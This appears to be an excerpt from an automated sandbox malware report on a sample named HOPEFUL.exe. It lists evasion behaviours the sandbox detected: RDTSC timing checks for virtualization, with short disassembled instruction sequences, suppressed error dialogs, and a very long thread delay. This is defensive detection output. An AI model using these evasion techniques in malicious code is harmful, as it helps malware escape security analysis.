          Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000000EC98E4 second address: 0000000000EC98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000000EC9B5E second address: 0000000000EC9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_00409A90 rdtsc 5_2_00409A90
          Source: C:\Users\user\Desktop\HOPEFUL.exe Thread delayed: delay time: 922337203685477